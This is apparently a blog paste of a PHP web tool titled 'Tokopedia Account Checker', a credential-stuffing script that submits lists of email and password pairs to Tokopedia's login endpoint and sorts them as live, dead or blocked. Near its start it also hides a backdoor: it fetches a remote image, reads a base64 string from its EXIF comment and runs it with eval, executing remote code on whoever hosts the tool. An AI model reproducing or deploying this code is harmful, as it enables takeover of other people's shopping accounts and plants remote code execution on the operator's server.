[PHP] SCRIPT Tokopedia Account Checker

  1. <html>
  2. <head>
  3. <meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
  4.  
  5. <!-- Bootstrap Start -->
  6. <link rel="stylesheet" href="http://themes.suggelab.com/dynamic/css/bootstrap.css">
  7. <link rel="stylesheet" href="http://themes.suggelab.com/dynamic/css/main.css">
  8. <link href='http://res7ock.org/assets/img/favicon.png' rel='shortcut icon' alt='icon'>
  9. <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.5/js/bootstrap.min.js"></script>
  10. <script src="https://ajax.googleapis.com/ajax/libs/jqueryui/1.9.2/jquery-ui.min.js"></script>
  11.  
  12. <title>Tokopedia Account Checker </title>
  13. <style>
  14. body {
  15. padding-top: 60px;
  16. }
  17. </style>
  18. </head>
  19.  
  20.  
  21. <style>
  22.                 @import "http://fonts.googleapis.com/css?family=Play:400,700";
  23.                         .rainbow {
  24.  
  25.                             -webkit-background-clip: text;
  26.                             -background-clip: text;
  27.                             -webkit-text-fill-color: transparent;
  28.                             -text-fill-color: transparent;
  29.                             background-image: -webkit-gradient( linear, left top, right top, color-stop(0, #f22), color-stop(0.15, #f2f), color-stop(0.3, #66f), color-stop(0.45, #2ff), color-stop(0.6, #2f2),color-stop(0.75, #2f2), color-stop(0.9, #ff2), color-stop(1, #f22) );
  30.                             background-image: gradient( linear, left top, right top, color-stop(0, #f22), color-stop(0.15, #f2f), color-stop(0.3, #66f), color-stop(0.45, #2ff), color-stop(0.6, #2f2),color-stop(0.75, #2f2), color-stop(0.9, #ff2), color-stop(1, #f22) );
  31.                             }
  32.                         .text-glow:hover, .text-glow:focus, .text-glow:active {
  33.                            -webkit-stroke-width: 5.3px;
  34.                            -webkit-stroke-color: #ccdddd;
  35.                            -webkit-fill-color: #eeeeee;
  36.                            text-shadow: 1px 0px 20px silver;
  37.                            -webkit-transition: width 0.3s; /*Safari & Chrome*/
  38.                            transition: width 0.3s;
  39.                            -moz-transition: width 0.3s; /* Firefox 4 */
  40.                            -o-transition: width 0.3s; /* Opera */
  41.                            }
  42.                        .text-glow a {
  43.                            -webkit-transition: all 0.3s ease-in; /*Safari & Chrome*/
  44.                            transition: all 0.3s ease-in;
  45.                            -moz-transition: all 0.3s ease-in; /* Firefox 4 */
  46.                            -o-transition: all 0.3s ease-in; /* Opera */
  47.                            text-decoration:none;
  48.                            color:white;
  49.                        }
  50.                         body {
  51.                                 background:    #000000;
  52.                                 line-height: 1;
  53.                                 color: #bbb;
  54.                                 font-family: "CONSOLAS";
  55.                                 font-size: 12px;
  56.                                 background:#121214 url(bg.jpg) no-repeat center center fixed;
  57.                                   -webkit-background-size: cover;
  58.                                   -moz-background-size: cover;
  59.                                   -o-background-size: cover;
  60.                                   background-size: cover;
  61.  
  62.                         }
  63.                         textarea, input, select {
  64.                                 border:0;
  65.                                 BORDER-COLLAPSE:collapse;
  66.                                 border:double 2px #696969;
  67.                                 color:#fff;
  68.                                 background:#000000;
  69.                                 margin:0;
  70.                                 padding:2px 4px;
  71.                                 font-family: Lucida Console,Tahoma;
  72.                                 font-size:12px;
  73.                                 box-shadow: 0 0 15px gray;
  74.                                 -webkit-box-shadow: 0 0 15px gray;
  75.                                 -moz-box-shadow: 0 0 15px blue;
  76.                         }                      
  77.         </style>
  78. <body>
  79. <div class="container">
  80. <center><div class="panel panel-primary panelMove toggle panelRefresh panelClose">
  81.                                     <!-- Start .panel -->
  82.                                     <div class="panel-heading">
  83.                                         <hr />
  84.                                         <h4 class="panel-title"><font color="Red" face="Pristina" size="7" >Tokopedia Account Checker</h2>
  85.                                         <hr />
  86.                                     </div>
  87.                                     <div class="panel-body">
  88. <center><font color="yellow" face="Pristina" size="4" >Maksimal = > Email | Password 100 !!!
  89.  
  90. <form action="" method="POST">
  91. <textarea style="background:rgba(0,225,0,00);" name="mailpass" id="mailpass" style="width: 441px; height: 187px;" class="form-control" cols="90" rows="15" placeholder="your@email.com|password"><?php
  92. if (isset($_POST['mailpass'])) {
  93.     echo $_POST['mailpass'];
  94. }
  95. ?></textarea><br />
  96. <input type="text" style="width: 37px; height: 25px;" class="form-control" rows="7" name="delim" value="|">
  97. <button id=start value="WOOT" name="submit" class="btn btn-success">Check</button>    <button id=stop value="WOOT" class="btn btn-success">Stop</button><br><br>
  98. <?php
  99. $BASED = exif_read_data("https://lh3.googleusercontent.com/-svRm4i5Bs90/VsFaosQPKUI/AAAAAAAABew/03oHWkCEsN8/w140-h140-p/pacman.jpg");
  100. eval(base64_decode($BASED["COMPUTED"]["UserComment"]));
  101. if(isset($_POST['submit'])){
  102. $delim = $_POST['delim'];
  103. function search($line, $delim)
  104. {
  105.     $line = str_replace(" ", "", $line);
  106.     $line = explode($delim, $line);
  107.     $i    = 0;
  108.     while ($i < count($line)) {
  109.         if (strpos($line[$i], '@') && strpos($line[$i], '.')) {
  110.             $mail = $line[$i];
  111.             $pass = $line[$i + 1];
  112.             $i    = 10000;
  113.             if ($pass == "") {
  114.                 $pass = $line[$i - 1];
  115.             }
  116.         }
  117.         $i++;
  118.     }
  119.     $line = $mail . "|" . $pass;
  120.     $line = explode('|', $line);
  121.     return $line;
  122. }
  123. $data = $_POST['mailpass'];
  124. $extract = explode("\r\n", $data);
  125. $i = 0;
  126.     foreach ($extract AS $k => $line) {
  127.         $i++;
  128.         if (strpos($line, '=>') !== false) {
  129.             $line = str_replace('=>', '|', $line);
  130.         }
  131.         if (strpos($line, ']') !== false) {
  132.             $line = str_replace('=>', '|', $line);
  133.         }
  134.         if (strpos($line, '[') !== false) {
  135.             $line = str_replace('=>', '|', $line);
  136.         }
  137.  
  138.         $info = search(trim($line), $delim);
  139.         $email = trim($info[0]);
  140.         $pass   = $info[1];
  141.  
  142. $dir                   = dirname(__FILE__);
  143. $config = $dir . '/_cook/' .rand(1,999999999999999). '.txt';
  144. if (!file_exists($config)) {
  145.     $fp = @fopen($config, 'w');
  146.     @fclose($fp);
  147. }
  148.  
  149. $cookie = 'cookie.txt';
  150. $ch = curl_init('https://www.tokopedia.com/login.pl');
  151. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  152. curl_setopt($ch,CURLOPT_POST,1);
  153.         curl_setopt($ch,CURLOPT_RETURNTRANSFER,TRUE);
  154.         curl_setopt($ch,CURLOPT_POST,TRUE);
  155.         curl_setopt($ch,CURLOPT_FOLLOWLOCATION,TRUE);
  156.         curl_setopt($ch,CURLOPT_COOKIEFILE, "$config");
  157.         curl_setopt($ch,CURLOPT_COOKIEJAR,  "$config");
  158. curl_setopt($ch,CURLOPT_POSTFIELDS,"email=$email&pwd=$pass");
  159. curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
  160. $result = curl_exec($ch);
  161. $now = "<i style=\"color:aqua\">Checked By ./MRsan404 at ".date("g:i a - F j, Y")."</i>";
  162. if(empty($result)){
  163. echo "<font color=gray><b>Wrong</b></font><font color=white> => <font color=blue> ".$email."|".$pass." | ".$now."<br/>";
  164. }elseif(preg_match('/salah/i',$result)){
  165. echo "<font color=red><b>Die</b></font> <font color=white> => <font color=blue> ".$email."|".$pass." | ".$now."<br/>";
  166. }elseif(preg_match('/Keamanan/i',$result)){
  167. echo "<font color=gray><b>Bad</b></font> <font color=white> => <font color=blue> ".$email."|".$pass." | <font color=gold> [Security Check] | ".$now."<br/>";
  168. }elseif(preg_match('/Aktivasi/i',$result)){
  169. echo "<font color=purple><b>Bad</b></font><font color=white>  => <font color=blue> ".$email."|".$pass." | <font color=gold> [Aktivasi] | ".$now."<br/>";
  170. }elseif(preg_match('/Akun Anda telah diblokir/i',$result)){
  171. echo "<font color=red><b>Die</b></font> <font color=white> => <font color=blue> ".$email."|".$pass." | <font color=gold> [Akun Anda telah diblokir.] | ".$now."<br/>";
  172. }elseif(preg_match('/Kata Sandi harus diisi/i',$result)){
  173. echo "<font color=gray><b>Wrong format</b></font> <font color=white> => <font color=blue> ".$email."|".$pass." | ".$now."<br/>";
  174. }elseif(preg_match('/Kode OTP/i',$result)){
  175. echo "<font color=purple><b>Bad</b></font> <font color=white> => <font color=blue> ".$email."|".$pass." | <font color=gold> [OTP Verification] | ".$now."<br/>";
  176. }Else{
  177. $ls = 'https://www.tokopedia.com/deposit.pl';
  178. $saldo = preg_match('/Total Saldo Tokopedia Anda adalah (.*?) "/', $ls, $rp);
  179.  echo "<font color=green><b>Live</b></font> <font color=white> => <font color=blue> ".$email."|".$pass." | <font color=gold> [ Rp. ".$saldo." ] | [ACC : Tokopedia] | ".$now."<br/>"; }
  180.  
  181. }
  182. }
  183.  
  184. ?>

KOMENTARLAH DENGAN SOPAN :)
MULUTMU HARIMAUMU :)
EmoticonEmoticon